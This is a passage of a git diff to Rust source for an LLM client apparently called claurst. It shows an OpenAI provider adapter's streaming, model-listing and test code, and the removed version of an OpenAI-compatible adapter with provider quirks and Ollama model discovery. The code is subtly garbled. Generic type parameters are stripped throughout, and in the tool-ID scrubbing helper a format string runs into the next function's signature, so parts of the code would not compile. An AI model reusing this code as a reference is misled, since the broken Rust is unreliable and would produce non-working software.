tool_calls { + let tc_index = tc + .get("index") + .and_then(|v| v.as_u64()) + .unwrap_or(0) as usize; + // OpenAI sends id/name only on the first chunk for each tool call. + if let Some(tc_id) = + tc.get("id").and_then(|v| v.as_str()) + { + let name = tc + .get("function") + .and_then(|f| f.get("name")) + .and_then(|v| v.as_str()) + .unwrap_or("") + .to_string(); + // OpenAI tool calls sit after the text block. + // Use index 1 + tc_index. + let block_index = 1 + tc_index; + tool_call_buffers.insert( + block_index, + (tc_id.to_string(), name.clone(), String::new()), + ); + yield Ok(StreamEvent::ContentBlockStart { + index: block_index, + content_block: ContentBlock::ToolUse { + id: tc_id.to_string(), + name, + input: json!({}), + }, + }); + } + // Argument fragment + if let Some(args_frag) = tc + .get("function") + .and_then(|f| f.get("arguments")) + .and_then(|v| v.as_str()) + { + if !args_frag.is_empty() { + let block_index = 1 + tc_index; + if let Some((_, _, buf)) = + tool_call_buffers.get_mut(&block_index) + { + buf.push_str(args_frag); + } + yield Ok(StreamEvent::InputJsonDelta { + index: block_index, + partial_json: args_frag.to_string(), + }); + } + } + } + } + + // finish_reason signals end of message. + if let Some(finish_reason) = + choice.get("finish_reason").and_then(|v| v.as_str()) + { + if !finish_reason.is_empty() && finish_reason != "null" { + // Close the text content block. + yield Ok(StreamEvent::ContentBlockStop { index: 0 }); + // Close any open tool call blocks. + let mut tc_indices: Vec = + tool_call_buffers.keys().cloned().collect(); + tc_indices.sort(); + for idx in tc_indices { + yield Ok(StreamEvent::ContentBlockStop { index: idx }); + } + + let stop_reason = + OpenAiProvider::map_finish_reason(finish_reason); + + // Usage might come in the same chunk or a later one. + let usage_val = chunk_json.get("usage"); + let usage = usage_val.map(|u| OpenAiProvider::parse_usage(Some(u))); + + yield Ok(StreamEvent::MessageDelta { + stop_reason: Some(stop_reason), + usage, + }); + } + } + } + } + + // If we consumed all bytes without seeing [DONE], emit stop. + if message_started { + yield Ok(StreamEvent::MessageStop); + } + }; + + Ok(Box::pin(s)) + } + + async fn list_models(&self) -> Result, ProviderError> { + let (auth_key, auth_val) = self.auth_header(); + let url = format!("{}/v1/models", self.base_url); + + let resp = self + .http_client + .get(&url) + .header(auth_key, auth_val) + .send() + .await + .map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("HTTP request failed: {}", e), + status: None, + body: None, + })?; + + let status = resp.status().as_u16(); + let text = resp.text().await.map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to read response body: {}", e), + status: Some(status), + body: None, + })?; + + if !(200..300).contains(&(status as usize)) { + return Err(self.map_http_error(status, &text)); + } + + let json: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other { + provider: self.id.clone(), + message: format!("Failed to parse models JSON: {}", e), + status: Some(status), + body: Some(text), + })?; + + let data = match json.get("data").and_then(|d| d.as_array()) { + Some(d) => d, + None => return Ok(vec![]), + }; + + let provider_id = self.id.clone(); + let models: Vec = data + .iter() + .filter_map(|m| { + let id = m.get("id").and_then(|v| v.as_str())?; + // Only return GPT, O3, O4 family models. + if !id.starts_with("gpt-") + && !id.starts_with("o3") + && !id.starts_with("o4") + && !id.starts_with("o1") + { + return None; + } + Some(ModelInfo { + id: ModelId::new(id), + provider_id: provider_id.clone(), + name: id.to_string(), + context_window: match id { + "gpt-5" | "gpt-5.4" | "gpt-5.2" | "gpt-5-mini" | "gpt-5-nano" + | "gpt-5-chat-latest" | "gpt-5.2-codex" | "gpt-5.1-codex" + | "gpt-5.1-codex-mini" | "gpt-5.1-codex-max" => 400_000, + "o3" | "o3-mini" | "o4-mini" => 200_000, + _ => 128_000, + }, + max_output_tokens: 16_384, + }) + }) + .collect(); + + Ok(models) + } + + async fn health_check(&self) -> Result { + let (auth_key, auth_val) = self.auth_header(); + let url = format!("{}/v1/models", self.base_url); + + let resp = self + .http_client + .get(&url) + .header(auth_key, auth_val) + .send() + .await; + + match resp { + Ok(r) if r.status().is_success() => Ok(ProviderStatus::Healthy), + Ok(r) => Ok(ProviderStatus::Unavailable { + reason: format!("models endpoint returned {}", r.status()), + }), + Err(e) => Ok(ProviderStatus::Unavailable { + reason: e.to_string(), + }), + } + } + + fn capabilities(&self) -> ProviderCapabilities { + ProviderCapabilities { + streaming: true, + tool_calling: true, + thinking: false, + image_input: true, + pdf_input: false, + audio_input: false, + video_input: false, + caching: false, + structured_output: true, + system_prompt_style: SystemPromptStyle::SystemMessage, + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use claurst_core::types::Message; + + #[test] + fn user_tool_results_become_tool_messages() { + let messages = vec![ + Message::assistant_blocks(vec![ContentBlock::ToolUse { + id: "call_1".to_string(), + name: "search".to_string(), + input: json!({ "q": "test" }), + }]), + Message::user_blocks(vec![ContentBlock::ToolResult { + tool_use_id: "call_1".to_string(), + content: ToolResultContent::Text("done".to_string()), + is_error: Some(false), + }]), + ]; + + let wire = OpenAiProvider::to_openai_messages(&messages, None); + assert_eq!(wire.len(), 2); + assert_eq!( + wire[0].get("role").and_then(|v| v.as_str()), + Some("assistant") + ); + assert_eq!(wire[1].get("role").and_then(|v| v.as_str()), Some("tool")); + assert_eq!( + wire[1].get("tool_call_id").and_then(|v| v.as_str()), + Some("call_1") + ); + assert_eq!( + wire[1].get("content").and_then(|v| v.as_str()), + Some("done") + ); + } + + #[test] + fn mixed_user_content_flushes_before_tool_result() { + let messages = vec![Message::user_blocks(vec![ + ContentBlock::Text { + text: "preface".to_string(), + }, + ContentBlock::ToolResult { + tool_use_id: "call_2".to_string(), + content: ToolResultContent::Text("ok".to_string()), + is_error: Some(false), + }, + ])]; + + let wire = OpenAiProvider::to_openai_messages(&messages, None); + assert_eq!(wire.len(), 2); + assert_eq!(wire[0].get("role").and_then(|v| v.as_str()), Some("user")); + assert_eq!(wire[1].get("role").and_then(|v| v.as_str()), Some("tool")); + assert_eq!( + wire[1].get("tool_call_id").and_then(|v| v.as_str()), + Some("call_2") + ); + } +} diff --git a/src-rust/crates/api/src/providers/openai_compat.rs b/src-rust/crates/api/src/providers/openai_compat.rs index eebeebf..3485562 100644 --- a/src-rust/crates/api/src/providers/openai_compat.rs +++ b/src-rust/crates/api/src/providers/openai_compat.rs @@ -1,1297 +1,1266 @@ -// providers/openai_compat.rs — OpenAI-Compatible generic provider adapter. -// -// A configurable OpenAI Chat Completions adapter that can target any -// provider exposing an OpenAI-compatible API. Configure base URL, auth, -// extra headers, and per-provider behavioural quirks via the builder API. - -use std::pin::Pin; - -use async_stream::stream; -use async_trait::async_trait; -use claurst_core::provider_id::{ModelId, ProviderId}; -use claurst_core::types::{ContentBlock, UsageInfo}; -use futures::Stream; -use serde_json::{json, Value}; -use tracing::debug; - -use crate::error_handling::parse_error_response; -use crate::provider::{LlmProvider, ModelInfo}; -use crate::provider_error::ProviderError; -use crate::provider_types::{ - ProviderCapabilities, ProviderRequest, ProviderResponse, ProviderStatus, - StreamEvent, SystemPromptStyle, -}; - -// Re-use the message transformation helpers from openai.rs. -use super::openai::OpenAiProvider; -use super::request_options::merge_openai_compatible_options; - -// --------------------------------------------------------------------------- -// ProviderQuirks -// --------------------------------------------------------------------------- - -/// Provider-specific behavioural quirks that alter how the generic adapter -/// builds and interprets requests/responses. -#[derive(Debug, Clone, Default)] -pub struct ProviderQuirks { - /// Truncate tool call IDs to at most this many characters before sending. - /// For example, Mistral requires tool IDs of at most 9 characters. - pub tool_id_max_len: Option, - - /// If `true`, strip all non-alphanumeric characters from tool IDs. - pub tool_id_alphanumeric_only: bool, - - /// Extra error-message substrings (or regex-like patterns) that indicate - /// the request exceeded the model's context window. - pub overflow_patterns: Vec, - - /// Whether to send `{"stream_options": {"include_usage": true}}` when - /// streaming. Required by some providers to receive token counts. - pub include_usage_in_stream: bool, - - /// Override the sampling temperature when the request does not specify one. - pub default_temperature: Option, - - /// Some providers (e.g. older Mistral releases) reject a message sequence - /// that goes …tool_result → user… without an intervening assistant turn. - /// When `true`, an `{"role":"assistant","content":"Done."}` message is - /// inserted between any `role: tool` message and a following `role: user` - /// message. - pub fix_tool_user_sequence: bool, - - /// Name of the JSON field in the assistant message that carries extended - /// reasoning / thinking text. `None` means the provider does not expose - /// reasoning output. Example: `Some("reasoning_content")` for DeepSeek. - pub reasoning_field: Option, - - /// Whether this provider requires reasoning_content to be echoed back on - /// subsequent turns in multi-turn conversations. DeepSeek V4 is currently - /// the only provider with this requirement; most providers ignore this field. - /// When false, reasoning is not included in outbound messages to save tokens. - pub requires_reasoning_roundtrip: bool, - - /// Hard cap on `max_tokens` sent to this provider. When the request - /// carries a higher value it is silently clamped down to this limit. - /// Use this for providers whose models have a lower output ceiling than - /// the default we request (e.g. DeepSeek Chat caps at 8 192). - pub max_tokens_cap: Option, - - /// Set to `true` for providers that never require an API key (e.g. - /// Ollama, LM Studio, llama.cpp). When `true`, `health_check()` will - /// always attempt a live network probe regardless of whether the base URL - /// points to a local or remote host, instead of short-circuiting with - /// "No API key configured". - pub no_api_key_required: bool, - - /// When set, `list_models()` uses Ollama's native `/api/tags` endpoint - /// (and optionally `/api/show` for per-model metadata) instead of the - /// OpenAI-compatible `/v1/models` endpoint. The value is the Ollama host - /// root (e.g. `"http://localhost:11434"`) so the native API can be called - /// independently of the `/v1` base URL used for chat completions. - pub ollama_native_host: Option, -} - -// --------------------------------------------------------------------------- -// OpenAiCompatProvider -// --------------------------------------------------------------------------- - -pub struct OpenAiCompatProvider { - id: ProviderId, - name: String, - base_url: String, - api_key: Option, - extra_headers: Vec<(String, String)>, - quirks: ProviderQuirks, - http_client: reqwest::Client, -} - -impl OpenAiCompatProvider { - /// Create a new compat provider. `base_url` should already include any - /// path prefix (e.g. `"https://api.groq.com/openai/v1"`). - pub fn new( - id: impl Into, - name: impl Into, - base_url: impl Into, - ) -> Self { - let http_client = reqwest::Client::builder() - .timeout(std::time::Duration::from_secs(600)) - .build() - .expect("failed to build reqwest client"); - - Self { - id: ProviderId::new(id), - name: name.into(), - base_url: base_url.into(), - api_key: None, - extra_headers: Vec::new(), - quirks: ProviderQuirks::default(), - http_client, - } - } - - /// Set an API key that will be sent as `Authorization: Bearer `. - pub fn with_api_key(mut self, key: String) -> Self { - self.api_key = if key.is_empty() { None } else { Some(key) }; - self - } - - /// Append a custom header sent on every request. - pub fn with_header( - mut self, - name: impl Into, - value: impl Into, - ) -> Self { - self.extra_headers.push((name.into(), value.into())); - self - } - - /// Apply provider-specific quirks. - pub fn with_quirks(mut self, quirks: ProviderQuirks) -> Self { - self.quirks = quirks; - self - } - - /// Override the base URL (e.g. from a user-supplied --api-base flag). - pub fn with_base_url(mut self, base_url: impl Into) -> Self { - self.base_url = base_url.into(); - self - } - - // ----------------------------------------------------------------------- - // Internal helpers - // ----------------------------------------------------------------------- - - /// Returns `true` when the provider has no usable API key. - fn has_no_key(&self) -> bool { - self.api_key.is_none() - } - - /// Scrub a tool-call ID according to the configured quirks. - fn scrub_tool_id(&self, id: &str) -> String { - let mut s = id.to_string(); - if self.quirks.tool_id_alphanumeric_only { - s = s.chars().filter(|c| c.is_alphanumeric()).collect(); - } - if let Some(max_len) = self.quirks.tool_id_max_len { - let truncated: String = s.chars().take(max_len).collect(); - s = format!("{:0) { - if self.quirks.tool_id_max_len.is_none() && !self.quirks.tool_id_alphanumeric_only { - return; - } - for msg in messages.iter_mut() { - // assistant message tool_calls[].id - if let Some(tcs) = msg.get_mut("tool_calls").and_then(|v| v.as_array_mut()) { - for tc in tcs.iter_mut() { - if let Some(id_val) = tc.get("id").and_then(|v| v.as_str()) { - let scrubbed = self.scrub_tool_id(id_val); - if let Some(obj) = tc.as_object_mut() { - obj.insert("id".to_string(), json!(scrubbed)); - } - } - } - } - // tool message tool_call_id - if let Some(id_val) = msg.get("tool_call_id").and_then(|v| v.as_str()) { - let scrubbed = self.scrub_tool_id(id_val); - if let Some(obj) = msg.as_object_mut() { - obj.insert("tool_call_id".to_string(), json!(scrubbed)); - } - } - } - } - - /// Insert `{"role":"assistant","content":"Done."}` between any - /// `role: tool` message that is immediately followed by a `role: user` - /// message. - fn apply_fix_tool_user_sequence(messages: &mut Vec) { - let mut i = 0; - while i + 1 < messages.len() { - let current_is_tool = messages[i] - .get("role") - .and_then(|v| v.as_str()) - == Some("tool"); - let next_is_user = messages[i + 1] - .get("role") - .and_then(|v| v.as_str()) - == Some("user"); - - if current_is_tool && next_is_user { - messages.insert( - i + 1, - json!({ "role": "assistant", "content": "Done." }), - ); - i += 2; // skip past the inserted message and the user message - } else { - i += 1; - } - } - } - - /// Build the full messages array, applying all quirks. - fn build_messages(&self, request: &ProviderRequest) -> Vec { - let mut messages = OpenAiProvider::to_openai_messages_pub( - &request.messages, - request.system_prompt.as_ref(), - ); - - self.apply_tool_id_quirks(&mut messages); - - if self.quirks.fix_tool_user_sequence { - Self::apply_fix_tool_user_sequence(&mut messages); - } - - // For providers that require reasoning_content in multi-turn conversations - // (e.g. DeepSeek V4), inject reasoning text back into assistant messages - // that contain tool calls. Non-tool-call turns omit the field to save tokens. - // Only providers with requires_reasoning_roundtrip=true need this. - if self.quirks.requires_reasoning_roundtrip { - if let Some(ref field) = self.quirks.reasoning_field { - Self::inject_reasoning_for_tool_turns( - &mut messages, - &request.messages, - field, - ); - } - } - - // Some providers (DeepSeek when reasoning_roundtrip enabled, Ollama) reject - // `content: null` on assistant messages — replace with an empty string. - if self.quirks.requires_reasoning_roundtrip || self.quirks.no_api_key_required { - Self::ensure_content_not_null(&mut messages); - } - - messages - } - - /// For providers that expose a reasoning field, inject the reasoning - /// text into assistant messages that contain tool calls. - /// - /// DeepSeek's thinking mode requires `reasoning_content` to be sent back - /// on turns where tool calls occurred. Turns without tool calls omit it — - /// the API ignores it anyway and skipping saves tokens. - fn inject_reasoning_for_tool_turns( - json_messages: &mut Vec, - original_messages: &[claurst_core::types::Message], - field: &str, - ) { - use claurst_core::types::{MessageContent, Role}; - - // Collect reasoning texts from assistant messages that have both - // Thinking blocks and ToolUse blocks, preserving order. - let reasoning_texts: Vec = original_messages - .iter() - .filter_map(|msg| { - if msg.role != Role::Assistant { - return None; - } - let blocks = match &msg.content { - MessageContent::Blocks(b) => b, - _ => return None, - }; - let has_tool_use = blocks - .iter() - .any(|b| matches!(b, ContentBlock::ToolUse { .. })); - if !has_tool_use { - return None; - } - let thinking: Vec<&str> = blocks - .iter() - .filter_map(|b| match b { - ContentBlock::Thinking { thinking, .. } => Some(thinking.as_str()), - _ => None, - }) - .collect(); - if thinking.is_empty() { - None - } else { - Some(thinking.join("")) - } - }) - .collect(); - - if reasoning_texts.is_empty() { - return; - } - - // Inject into JSON messages: for each assistant message that carries - // tool_calls, add the reasoning field from the collected texts. - let mut reasoning_idx = 0; - for msg in json_messages.iter_mut() { - if reasoning_idx >= reasoning_texts.len() { - break; - } - let is_assistant = - msg.get("role").and_then(|r| r.as_str()) == Some("assistant"); - let has_tool_calls = msg - .get("tool_calls") - .and_then(|tc| tc.as_array()) - .map(|a| !a.is_empty()) - .unwrap_or(false); - if is_assistant && has_tool_calls { - if let Some(obj) = msg.as_object_mut() { - obj.insert( - field.to_string(), - Value::String(reasoning_texts[reasoning_idx].clone()), - ); - } - reasoning_idx += 1; - } - } - } - - /// Replace `content: null` with `content: ""` on all assistant messages. - /// - /// DeepSeek's API rejects assistant messages that have `content: null` - /// (it treats null as absent and then complains that neither content nor - /// tool_calls is set). Replacing with an empty string satisfies the - /// validation while preserving semantics. - fn ensure_content_not_null(messages: &mut Vec) { - for msg in messages.iter_mut() { - let is_assistant = - msg.get("role").and_then(|r| r.as_str()) == Some("assistant"); - if !is_assistant { - continue; - } - if let Some(obj) = msg.as_object_mut() { - if let Some(content) = obj.get("content") { - if content.is_null() { - obj.insert("content".to_string(), Value::String(String::new())); - } - } - } - } - } - - /// Resolve the temperature to use: request value takes priority, then - /// the quirk default, then nothing (let the API default apply). - fn resolve_temperature(&self, request: &ProviderRequest) -> Option { - request.temperature.or(self.quirks.default_temperature) - } - - /// Attach the authorization header if an API key is configured. - fn apply_auth( - &self, - builder: reqwest::RequestBuilder, - ) -> reqwest::RequestBuilder { - if let Some(key) = &self.api_key { - builder.header("Authorization", format!("Bearer {}", key)) - } else { - builder - } - } - - /// Attach all configured extra headers. - fn apply_extra_headers( - &self, - mut builder: reqwest::RequestBuilder, - ) -> reqwest::RequestBuilder { - for (name, value) in &self.extra_headers { - builder = builder.header(name.as_str(), value.as_str()); - } - builder - } - - fn map_http_error(&self, status: u16, body: &str) -> ProviderError { - parse_error_response(status, body, &self.id) - } - - // ----------------------------------------------------------------------- - // Non-streaming - // ----------------------------------------------------------------------- - - async fn create_message_non_streaming( - &self, - request: &ProviderRequest, - ) -> Result { - let messages = self.build_messages(request); - let tools = OpenAiProvider::to_openai_tools_pub(&request.tools); - - let max_tokens = match self.quirks.max_tokens_cap { - Some(cap) => request.max_tokens.min(cap), - None => request.max_tokens, - }; - let mut body = json!({ - "model": request.model, - "max_tokens": max_tokens, - "messages": messages, - "stream": false, - }); - - if !tools.is_empty() { - body["tools"] = json!(tools); - } - if let Some(t) = self.resolve_temperature(request) { - body["temperature"] = json!(t); - } - if let Some(p) = request.top_p { - body["top_p"] = json!(p); - } - if !request.stop_sequences.is_empty() { - body["stop"] = json!(request.stop_sequences); - } - merge_openai_compatible_options(&mut body, &request.provider_options); - - let url = format!("{}/chat/completions", self.base_url.trim_end_matches('/')); - let builder = self - .http_client - .post(&url) - .header("Content-Type", "application/json"); - let builder = self.apply_auth(builder); - let builder = self.apply_extra_headers(builder); - - let resp = builder - .json(&body) - .send() - .await - .map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("HTTP request failed: {}", e), - status: None, - body: None, - })?; - - let status = resp.status().as_u16(); - let text = resp.text().await.map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to read response body: {}", e), - status: Some(status), - body: None, - })?; - - if !(200..300).contains(&(status as usize)) { - return Err(self.map_http_error(status, &text)); - } - - let json: Value = - serde_json::from_str(&text).map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to parse response JSON: {}", e), - status: Some(status), - body: Some(text.clone()), - })?; - - OpenAiProvider::parse_non_streaming_response_pub(&json, &self.id) - } - - // ----------------------------------------------------------------------- - // Streaming - // ----------------------------------------------------------------------- - - async fn do_streaming( - &self, - request: &ProviderRequest, - ) -> Result { - let messages = self.build_messages(request); - let tools = OpenAiProvider::to_openai_tools_pub(&request.tools); - - let max_tokens = match self.quirks.max_tokens_cap { - Some(cap) => request.max_tokens.min(cap), - None => request.max_tokens, - }; - let mut body = json!({ - "model": request.model, - "max_tokens": max_tokens, - "messages": messages, - "stream": true, - }); - - if self.quirks.include_usage_in_stream { - body["stream_options"] = json!({ "include_usage": true }); - } - - if !tools.is_empty() { - body["tools"] = json!(tools); - } - if let Some(t) = self.resolve_temperature(request) { - body["temperature"] = json!(t); - } - if let Some(p) = request.top_p { - body["top_p"] = json!(p); - } - if !request.stop_sequences.is_empty() { - body["stop"] = json!(request.stop_sequences); - } - merge_openai_compatible_options(&mut body, &request.provider_options); - - let url = format!("{}/chat/completions", self.base_url.trim_end_matches('/')); - let builder = self - .http_client - .post(&url) - .header("Content-Type", "application/json") - .header("Accept", "text/event-stream"); - let builder = self.apply_auth(builder); - let builder = self.apply_extra_headers(builder); - - let resp = builder - .json(&body) - .send() - .await - .map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("HTTP request failed: {}", e), - status: None, - body: None, - })?; - - let status = resp.status().as_u16(); - if !(200..300).contains(&(status as usize)) { - let text = resp.text().await.unwrap_or_default(); - return Err(self.map_http_error(status, &text)); - } - - Ok(resp) - } - - // ----------------------------------------------------------------------- - // Ollama native model discovery - // ----------------------------------------------------------------------- - - /// List models using Ollama's native `/api/tags` endpoint, then enrich - /// each model with metadata from `/api/show` (context window, parameter - /// size, quantization level). - /// - /// Models are sorted with coding-oriented models first (names containing - /// "code" or "coder"), then by parameter size descending, so the best - /// local coding model naturally appears at the top. - async fn list_models_ollama_native( - &self, - ollama_host: &str, - ) -> Result, ProviderError> { - let tags_url = format!("{}/api/tags", ollama_host.trim_end_matches('/')); - - let resp = self.http_client.get(&tags_url).send().await.map_err(|e| { - ProviderError::Other { - provider: self.id.clone(), - message: format!("Ollama /api/tags request failed: {}", e), - status: None, - body: None, - } - })?; - - let status = resp.status().as_u16(); - let text = resp.text().await.map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to read /api/tags response: {}", e), - status: Some(status), - body: None, - })?; - - if !(200..300).contains(&(status as usize)) { - return Err(self.map_http_error(status, &text)); - } - - let json: Value = serde_json::from_str(&text).map_err(|e| ProviderError::Other { - provider: self.id.clone(), - message: format!("Failed to parse /api/tags JSON: {}", e), - status: Some(status), - body: Some(text), - })?; - - let models_arr = match json.get("models").and_then(|m| m.as_array()) { - Some(m) => m, - None => return Ok(vec![]), - }; - - // Collect model names from /api/tags. - let model_names: Vec = models_arr - .iter() - .filter_map(|m| m.get("name").and_then(|n| n.as_str()).map(String::from)) - .collect(); - - // Fetch detailed metadata for each model via /api/show. - let show_url_base = format!("{}/api/show", ollama_host.trim_end_matches('/')); - let provider_id = self.id.clone(); - - let mut models: Vec<(ModelInfo, bool, u64)> = Vec::with_capacity(model_names.len()); - - for name in &model_names { - let (context_window, max_output, is_coder, param_size) = - self.fetch_ollama_model_info(&show_url_base, name).await; - - models.push(( - ModelInfo { - id: ModelId::new(name.as_str()), - provider_id: provider_id.clone(), - name: Self::ollama_display_name(name), - context_window, - max_output_tokens: max_output, - }, - is_coder, - param_size, - )); - } - - // Sort: coding models first, then by parameter size descending. - models.sort_by(|a, b| { - b.1.cmp(&a.1) // coders first - .then_with(|| b.2.cmp(&a.2)) // larger models first - }); - - Ok(models.into_iter().map(|(info, _, _)| info).collect()) - } - - /// Call `/api/show` for a single model to extract its actual context - /// window, parameter count, and whether it's coding-oriented. - /// - /// Returns `(context_window, max_output_tokens, is_coder, param_size_bytes)`. - /// Falls back to sensible defaults if the request fails. - async fn fetch_ollama_model_info( - &self, - show_url: &str, - model_name: &str, - ) -> (u32, u32, bool, u64) { - let default_ctx = 4_096u32; - let default_out = 2_048u32; - let lower = model_name.to_lowercase(); - let is_coder_by_name = lower.contains("code") - || lower.contains("coder") - || lower.contains("codestral") - || lower.contains("starcoder") - || lower.contains("deepseek-coder") - || lower.contains("qwen2.5-coder"); - - let body = serde_json::json!({ "name": model_name }); - let resp = match self.http_client.post(show_url).json(&body).send().await { - Ok(r) if r.status().is_success() => r, - _ => return (default_ctx, default_out, is_coder_by_name, 0), - }; - - let json: Value = match resp.json().await { - Ok(j) => j, - Err(_) => return (default_ctx, default_out, is_coder_by_name, 0), - }; - - // Extract parameter size from model_info. - let param_size = json - .get("model_info") - .and_then(|mi| { - mi.get("general.parameter_count") - .and_then(|v| v.as_u64()) - }) - .unwrap_or(0); - - // Extract num_ctx from the modelfile parameters or model_info. - let num_ctx = Self::extract_num_ctx(&json).unwrap_or(default_ctx); - - // Max output is typically a fraction of context window for local - // models. Use half the context or 4096, whichever is smaller. - let max_output = std::cmp::min(num_ctx / 2, 4_096); - - // Check if the model family or template indicates coding capability. - let family = json - .get("model_info") - .and_then(|mi| mi.get("general.basename").and_then(|v| v.as_str())) - .unwrap_or(""); - let is_coder = is_coder_by_name - || family.contains("code") - || family.contains("coder"); - - (num_ctx, max_output, is_coder, param_size) - } - - /// Extract `num_ctx` (context window) from the `/api/show` response. - /// - /// Ollama stores this in the modelfile parameters string (e.g. - /// `"num_ctx 32768"`) or in `model_info` under context-length keys. - fn extract_num_ctx(json: &Value) -> Option { - // 1. Check model_info for context length keys. - if let Some(mi) = json.get("model_info") { - for key in &[ - "llama.context_length", - "qwen2.context_length", - "gemma.context_length", - "gemma2.context_length", - "phi3.context_length", - "mistral.context_length", - "starcoder2.context_length", - "deepseek2.context_length", - "command-r.context_length", - "granite.context_length", - ] { - if let Some(v) = mi.get(*key).and_then(|v| v.as_u64()) { - return Some(v as u32); - } - } - - // Fallback: scan all keys ending in ".context_length" - if let Some(obj) = mi.as_object() { - for (k, v) in obj { - if k.ends_with(".context_length") { - if let Some(n) = v.as_u64() { - return Some(n as u32); - } - } - } - } - } - - // 2. Parse from the modelfile parameters string. - if let Some(params) = json.get("parameters").and_then(|p| p.as_str()) { - for line in params.lines() { - let trimmed = line.trim(); - if let Some(rest) = trimmed.strip_prefix("num_ctx") { - if let Ok(n) = rest.trim().parse::() { - return Some(n); - } - } - } - } - - None - } - - /// Produce a human-readable display name from an Ollama model name. - /// - /// `"qwen2.5-coder:32b-instruct-q4_K_M"` → `"Qwen 2.5 Coder (32B, Q4_K_M)"` - fn ollama_display_name(raw: &str) -> String { - let (base, tag) = raw.split_once(':').unwrap_or((raw, "latest")); - - let pretty_base = base - .replace('-', " ") - .replace('_', " ") - .split_whitespace() - .map(|word| { - let mut chars = word.chars(); - match chars.next() { - None => String::new(), - Some(c) => { - let upper: String = c.to_uppercase().collect(); - format!("{}{}", upper, chars.as_str()) - } - } - }) - .collect::>() - .join(" "); - - if tag == "latest" { - return pretty_base; - } - - let tag_parts: Vec<&str> = tag.split('-').collect(); - let mut size_part = None; - let mut quant_part = None; - for part in &tag_parts { - let lower = part.to_lowercase(); - if lower.ends_with('b') && lower.trim_end_matches('b').parse::().is_ok() { - size_part = Some(part.to_uppercase()); - } else if lower.starts_with('q') && lower.len() > 1 { - quant_part = Some(part.to_uppercase()); - } - } - - match (size_part, quant_part) { - (Some(s), Some(q)) => format!("{} ({}, {})", pretty_base, s, q), - (Some(s), None) => format!("{} ({})", pretty_base, s), - (None, Some(q)) => format!("{} ({})", pretty_base, q), - (None, None) => format!("{} ({})", pretty_base, tag), - } - } -} - -// --------------------------------------------------------------------------- -// LlmProvider impl -// --------------------------------------------------------------------------- - -#[async_trait] -impl LlmProvider for OpenAiCompatProvider { - fn id(&self) -> &ProviderId { - &self.id - } - - fn name(&self) -> &str { - &self.name - } - - async fn create_message( - &self, - request: ProviderRequest, - ) -> Result { - if self.has_no_key() { - // Providers that have no key set are considered unconfigured. - // We allow the call to proceed in case the provider genuinely needs - // no auth (e.g. Ollama), but callers that gate on health_check() - // will see Unavailable first. - } - self.create_message_non_streaming(&request).await - } - - async fn create_message_stream( - &self, - request: ProviderRequest, - ) -> Result> + Send>>, ProviderError> - { - let resp = self.do_streaming(&request).await?; - let provider_id = self.id.clone(); - let reasoning_field = self.quirks.reasoning_field.clone(); - - let s = stream! { - use futures::StreamExt; - - let mut byte_stream = resp.bytes_stream(); - let mut leftover = String::new(); - - let mut message_started = false; - let mut message_id = String::from("unknown"); - let mut model_name = String::new(); - // Dedicated index for the Thinking content block emitted when a - // provider streams a `reasoning_content` field (DeepSeek V4, etc.). - // Chosen to avoid colliding with text (index 0) or tool calls - // (1 + tc_index). - const THINKING_BLOCK_INDEX: usize = usize::MAX - 100; - let mut thinking_open = false; - let mut tool_call_buffers: std::collections::HashMap< - usize, - (String, String, String), - > = std::collections::HashMap::new(); - - while let Some(chunk_result) = byte_stream.next().await { - let chunk = match chunk_result { - Ok(c) => c, - Err(e) => { - yield Err(ProviderError::StreamError { - provider: provider_id.clone(), - message: format!("Stream read error: {}", e), - partial_response: None, - }); - return; - } - }; - - let text = String::from_utf8_lossy(&chunk); - let combined = if leftover.is_empty() { - text.to_string() - } else { - let mut s = std::mem::take(&mut leftover); - s.push_str(&text); - s - }; - - let mut lines: Vec<&str> = combined.split('\n').collect(); - if !combined.ends_with('\n') { - leftover = lines.pop().unwrap_or("").to_string(); - } - - for line in lines { - let line = line.trim_end_matches('\r').trim(); - - if line.is_empty() || line.starts_with(':') { - continue; - } - - let data = if let Some(rest) = line.strip_prefix("data:") { - rest.trim() - } else { - continue; - }; - - if data == "[DONE]" { - yield Ok(StreamEvent::MessageStop); - return; - } - - let chunk_json: Value = match serde_json::from_str(data) { - Ok(v) => v, - Err(e) => { - debug!("Failed to parse SSE chunk: {}: {}", e, data); - continue; - } - }; - - if !message_started { - if let Some(id) = chunk_json.get("id").and_then(|v| v.as_str()) { - message_id = id.to_string(); - } - if let Some(m) = chunk_json.get("model").and_then(|v| v.as_str()) { - model_name = m.to_string(); - } - yield Ok(StreamEvent::MessageStart { - id: message_id.clone(), - model: model_name.clone(), - usage: UsageInfo::default(), - }); - yield Ok(StreamEvent::ContentBlockStart { - index: 0, - content_block: ContentBlock::Text { text: String::new() }, - }); - message_started = true; - } - - let choices = match chunk_json.get("choices").and_then(|c| c.as_array()) { - Some(c) => c, - None => { - if let Some(usage_val) = chunk_json.get("usage") { - let usage = OpenAiProvider::parse_usage_pub(Some(usage_val)); - yield Ok(StreamEvent::MessageDelta { - stop_reason: None, - usage: Some(usage), - }); - } - continue; - } - }; - - let choice = match choices.first() { - Some(c) => c, - None => continue, - }; - - let delta = match choice.get("delta") { - Some(d) => d, - None => continue, - }; - - // Reasoning / thinking extraction. - // Check the provider-specific field first (e.g. DeepSeek's - // "reasoning_content"), then fall back to common field names - // used by other providers (Copilot "reasoning_text", generic - // "reasoning", etc.). This allows reasoning traces to show - // for any provider that emits them without needing explicit - // per-provider configuration. - { - const COMMON_REASONING_FIELDS: &[&str] = &[ - "reasoning_content", // DeepSeek - "reasoning_text", // GitHub Copilot - "reasoning", // Generic / future - ]; - let fields_to_check: Vec<&str> = if let Some(ref f) = reasoning_field { - // Provider-specific field first, then common ones - let mut v = vec![f.as_str()]; - for common in COMMON_REASONING_FIELDS { - if *common != f.as_str() { - v.push(common); - } - } - v - } else { - COMMON_REASONING_FIELDS.to_vec() - }; - for field in &fields_to_check { - if let Some(reasoning) = delta.get(*field).and_then(|v| v.as_str()) { - if !reasoning.is_empty() { - // Open a dedicated Thinking block on first - // reasoning delta so the accumulator has a - 